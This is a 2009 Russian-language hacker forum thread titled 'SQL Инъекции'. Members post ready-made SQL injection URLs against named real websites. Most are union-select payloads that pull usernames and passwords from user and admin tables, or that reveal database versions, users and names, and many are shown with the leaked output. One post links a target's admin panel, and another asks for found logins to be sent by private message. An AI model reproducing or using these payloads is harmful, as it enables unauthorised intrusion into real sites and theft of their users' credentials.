SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    Code:
    http://www.alv-cr.cz/members.php?id=-24+union+select+1,concat(user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+users--
    
    Code:
    http://www.kuklachev.ru/show_article.php?page=articles&id=-16+union+select+1,concat(name,0x3a,member_login_key),3+from+fm_members+limit+1,1
    
    з.ы. сайт куклачёва xD

    Code:
    http://www.indiani.cz/web/articles.php?id=-52+union+select+1,concat(login,0x3a,heslo),3,4,5,6,7+from+admin--
    
    Code:
    http://www.flightsim.cz/article.php?id=-53+union+select+1,concat(fs01_username,0x3a,fs01_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+fs01_users--
    
     
    #10041 mr.gr33n, 8 Jul 2009
    Last edited by a moderator: 8 Jul 2009
    1 person likes this.
  2. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    Еще чуток

    Code:
    [COLOR=Lime]http://www.pshsoft.net/pshsoft/en/product.php?id=-10013+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15+from+user
    
    http://wap.relatio.ro/onews/cat.php?id=13++union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mos_users--
    
    http://www.disa-international.com/news.php?id=-34+union+select+concat(username,0x3a,password),2,3,4+from+admins--
    
    http://www.hageshii.org/pages/film.php?id=-33+union+select+1,concat(user_name,0x3a,user_pwd),3,4,5,6,7,8,9+from+dc_user--
    
    http://www.merchandisingf1.com/en/news.php?id=-34+union+select+1,2,3,concat(username_usr,0x3a,password_usr),5,6,7,8,9+from+mll_users_usr--
    
    http://webdevtips.co.uk/webdevtips/article.php?item=-63+union+select+1,concat(username,0x3a,user_password),3,4,5,6,7+from+phpbb_users+limit+1,1--
    [/COLOR]
    
     
    1 person likes this.
  3. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    HTML:
    http://www.worksmart.org.uk/jargonbuster/index.php?id=-20+union+select+1,concat_ws(0x3a,version(),user(),database())--
    4.1.20:worksmart@localhost:tuc

    HTML:
    http://www.urolognadom.ru/index.php?id=-2+union+select+1,2,3,4,5,concat_ws(0x3a3a,version(),user(),database()),7--
    4.1.22::[email protected]::wwwurolognadomru_urolog

    HTML:
    http://www.cbr-group.ru/index.php?id=-22+union+select+1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16--
    4.0.24_Debian-10sarge2-log::cbr-group@localhost::cbr-group
     
    #10043 Bramin, 9 Jul 2009
    Last edited: 9 Jul 2009
  4. en4cer

    en4cer Elder - Старейшина

    Joined:
    10 Feb 2006
    Messages:
    80
    Likes Received:
    5
    Reputations:
    0
    Code:
    http://www.lj-data.dk/vare_soft.php?varenr='UNION+SELECT+1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6,7,8,9'
    [email protected]:ljdatadk:5.0.51a-log
     
  5. pelligrim

    pelligrim Elder - Старейшина

    Joined:
    26 Apr 2008
    Messages:
    31
    Likes Received:
    20
    Reputations:
    0
    HTML:
    http://pyatoe.ru/info/articles/?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())--
    4.1.22-log:pyatoer1_:pyatoer1_1@localhost

    HTML:
    http://www.belembassy.org/moldova/index.php?id=3&d=articles&economic_id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())--
    4.1.21:moldova:mfa@localhost
     
  6. Fata1ex

    Fata1ex Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    703
    Likes Received:
    300
    Reputations:
    38
    eurotrade.hr
    магазин, распространяющий it продукцию :)
    Code:
    http://www.eurotrade.hr/eurotrade/cijenik.php?id=3&id1=-7+union+select+1,2,3/*
    EUROTRA_DAVID@LOCALHOST:4.1.22:EUROTRA_EUROTRADE
    /home/sites/www.eurotrade.hr/eurotrade/
     
  7. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    Code:
    http://www.mediastar.ru/news/?nid=-466+union+select+1,2,concat_ws(0x3a3a3a,user(),version(),database()),4,5,6,7--
    
    [email protected]:::4.0.23a:::mediastar

    pr:4
    тиц:150

    Code:
    http://www.mydj.ru/?sid=-31224+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    mydj01@localhost:mydj01:5.0.45

    Code:
    http://www.mydj.ru/?sid=-31224+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables--
    pr:2
    тиц:180
     
    #10047 ..::TROYAN::.., 9 Jul 2009
    Last edited: 9 Jul 2009
    5 people like this.
  8. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    Code:
    http://www.pacesetterevents.com/news.php?id=-
    65+union+select+1,concat(Name,0x3a,Password),3,4,5,6,7+from+pacesett_regdb.users--
    
    Code:
    http://www.cahcare.com/news.php?id=-65+union+select+1,concat(username,0x3a,passwd),3,4,5,6,7,8+from+cahcare_users+limit+5,1--
    [COLOR=Red]-------------------------[/COLOR]
    http://www.cahcare.com/admin/
    
    -------------
     
    #10048 mr.gr33n, 9 Jul 2009
    Last edited by a moderator: 9 Jul 2009
  9. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    HTML:
    http://www.logar.ru/index.php?act=top_list&id=-22+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7--
    4.0.27-log:[email protected]:logar1815
     
    #10049 Bramin, 9 Jul 2009
    Last edited by a moderator: 9 Jul 2009
  10. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    http://www.audioza.ru/audiobook.php?book_id=-66+union+select+1,2,3,4,5,6,count(*),8+from+admin

    5тая ветка

    пр 2 тиц 30



    http://euroreviews.eu.funpic.de/bookdetails.php?book_id=-409+union+select+1,2,pass,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users

    пр 3
     
    #10050 Krist_ALL, 9 Jul 2009
    Last edited: 9 Jul 2009
  11. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    Code:
    http://www.machinestudios.co.uk/viewentry.php?id=1+union+select+1,2,3,4,5,concat_ws(0x3a,username,password)+from+logins--
    Database Version: 5.0.67-log
    Database name: DB515306
    User name: [email protected]
     
  12. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    Code:
    http://www.timefare.com/products.php?CAT=3+limit+0+UNION+SELECT+1,CONCAT(Version(),Database(),User()),3--
    4.1.22-standard time_products time_web@localhost
     
  13. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    Code:
    http://www.imaginemason.org/home.php?ID=73+limit+0+UNION+SELECT+1,2,3,4,5,6,7,CONCAT(Version(),Database(),User()),9,10,11,12,13--
    Database Version: 5.0.67-log
    Database name: mason_data
    User name: [email protected]
     
    1 person likes this.
  14. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    Code:
    http://www.gtbike.ru/news.php?id=-95+union+select+1,2,3,4,5,concat(username,0x3a,user_password),7,8,9+from+gt_phpbb_users+limit+1,1--
    
    =========
     
    #10054 mr.gr33n, 9 Jul 2009
    Last edited by a moderator: 9 Jul 2009
    2 people like this.
  15. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    Code:
    http://www.eurodownload.com/download-links.php?cat=3+union+select+CONCAT(Version(),Database(),User())+limit+1,1--
    Database Version: 5.0.45
    Database name: eurodownload
    User name: eurouser@localhost


    Code:
    http://www.eurodownload.com/download-links.php?cat=3+limit+0+UNION+SELECT+CONCAT((SELECT+CONCAT(developers_login,developers_passwd)+FROM+eurodownload.ed_developers+limit+1,1))--
    хз куда там вводить логин пасс,если найдете киньте в ПМ
     
  16. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    http://www.arminfo.info/index.php?show=article&id=-15366+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+articles 4я ветка
     
    3 people like this.
  17. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://www.vectorsjournal.org/index.php?page=7&projectId=-57+UNION+SELECT+concat_ws(0x3a,%20user(),%20database(),%20version()),2/*

    в титле

    http://www.terastudio.com/index.php?page=ar&n=-1854+UNION+SELECT+1,2,3,concat_ws(0x3C42523E,%20user(),%20database(),%20version()),5,6,7,8,9,10,11,12+/*
     
    #10057 Ctacok, 9 Jul 2009
    Last edited: 10 Jul 2009
    1 person likes this.
  18. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    Code:
    http://www.owv-hv.de/wanderwege/wanderwege.php?id=-1+union+select+1,concat_ws(0x3a,g_userName,g_hashedPassword,g_email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17+from+usr_web4_2.g1_User+limit+1,1/*
    Database Version: 5.0.32-Debian_7etch8-log
    Database name: usr_web4_1
    User name: web4@localhost
     
  19. Phen1x

    Phen1x Member

    Joined:
    21 May 2006
    Messages:
    9
    Likes Received:
    13
    Reputations:
    0
    http://www.bottegangeli.com/prod_details.php?prod_id=-1+union+select+1,2,3,4,5,6,concat(table_name,0x20,column_name,0x20,table_schema),8,9,10,11,12,13,14+from+information_schema.columns


    http://specialtylingerie.ca/lingerie.php?lsID=-1+union+select+1,2,3,4,version()
     
  20. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    [PR 5]
    Code:
    http://www.guesthouses.be/template/kalender.php?id=-53+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87
    5.0.22:guesthouses02:guesthouses@localhost
    =====================
    [PR 5]
    Code:
    http://www.zuidpool.be/kalender.php?ID=-32+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7--&productienaam=kReon
    4.1.21-standard:zuidpool:zuidpool@localhost
    =====================
    [PR 4]
    Code:
    http://www.fsek.lth.se/old//kalender.php?id=-592+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8&month=-20
    5.0.54-log:web:web@localhost
    =====================
    [PR 2]
    Code:
    http://www.bmcenter.be/kalender.php?ID=-99+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5
    5.0.45-Dotdeb_0.dotdeb.1.1.CGA.1:bmcenter:[email protected]
    Code:
    http://www.bmcenter.be/kalender.php?ID=-99+union+select+1,2,3,concat_ws(0x3a,user,password,file_priv),5+from+mysql.user
    Code:
    http://www.bmcenter.be/kalender.php?ID=-99+union+select+1,2,3,concat_ws(0x3a,user,pwd),5+from+user
    =====================
    [PR 1]
    Code:
    http://www.heidetravel.be/kalender.php?id=-14+union+select+concat_ws(0x3a,version(),database(),user()),2
    5.0.32-Debian_7etch10-log:heidetravel_be:[email protected]
    =====================
    [PR 1]
    Code:
    http://www.bockmans.se/kalender.php?id=-17+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
    4.0.27-standard:easyinfo_k:[email protected]
    =====================
    [PR 0]
    Code:
    http://www.pluspunthw.nl/kalender.php?id=10+union+select+1,2,concat_ws(0x3a,version(),database(),user())+limit+1,1
    5.0.51a-24-log:leenb_ppunt:[email protected]
     
    1 person likes this.
Thread Status:
Not open for further replies.